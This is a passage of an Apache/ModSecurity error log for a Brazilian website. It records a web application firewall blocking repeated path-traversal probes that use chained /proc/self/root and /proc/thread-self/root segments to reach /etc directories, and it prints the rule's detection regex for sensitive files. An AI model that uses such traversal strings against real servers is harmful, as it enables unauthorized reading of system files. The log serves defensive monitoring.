"abpfXcdf6f5d65gmYZSbfgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:16:36.818290 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:34164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfZNY0UrI5A3LftIxgDgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:16:47.144193 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:40406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfb8df6f5d65gmYZSbjwAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:16:52.727944 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.241.31:57052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfdEzinOy1jxa1j4fc2wAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:17:22.977567 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.228.61:50724] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpfkvu8EFLIOrSqIpvQSAAAAkM"]
[Wed Mar 18 05:17:24.294219 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.244.43:60986] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpflAkwaGbbGflqUZDbQgAAAM0"]
[Wed Mar 18 05:17:28.559235 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.241.31:57066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfmPu8EFLIOrSqIpvQTgAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:17:50.069003 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:55114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfrgkwaGbbGflqUZDbVwAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:17:53.625545 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:36192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfscdf6f5d65gmYZSbmwAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:18:02.531157 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:36208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpfukzinOy1jxa1j4fc8QAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:19:06.623561 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.241.31:39496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpf-vu8EFLIOrSqIpvQjQAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:19:20.067279 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.241.31:57706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpgCEzinOy1jxa1j4fdDAAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:19:28.263135 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:54912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpgEEzinOy1jxa1j4fdFAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:19:35.971363 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.241.31:49046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpgFymAPhZkrhU8w4k4OAAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:19:55.767054 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:58288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpgK-oXxyEfFpUF8f82uQAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:20:24.132905 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:55938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpgR8df6f5d65gmYZSb0QAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:21:30.072662 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:37940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpgitY0UrI5A3LftIxgsgAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:21:35.687566 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.241.31:34396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpgj-w_le52K8_3pV2rDgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:22:23.551182 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.228.61:51020] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpgv_u8EFLIOrSqIpvRAgAAAko"]
[Wed Mar 18 05:22:26.735295 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.244.43:43856] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpgwgkwaGbbGflqUZDb7wAAAMo"]
[Wed Mar 18 05:23:50.779725 2026] [mime_magic:error] [pid 26799:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:64933] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 05:23:55.286314 2026] [mime_magic:error] [pid 15051:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:60029] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 05:24:19.490560 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:54132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphMwkwaGbbGflqUZDcVwAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:24:20.787000 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:36562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphNOyqAr6etmhZHNqFzgAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:26:02.544357 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:36576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphmimAPhZkrhU8w4k6BQAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:26:13.797044 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:34762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphpdY0UrI5A3LftIxhagAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:26:15.229792 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.241.31:53194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphp_u8EFLIOrSqIpvRlQAAAkw"], referer: 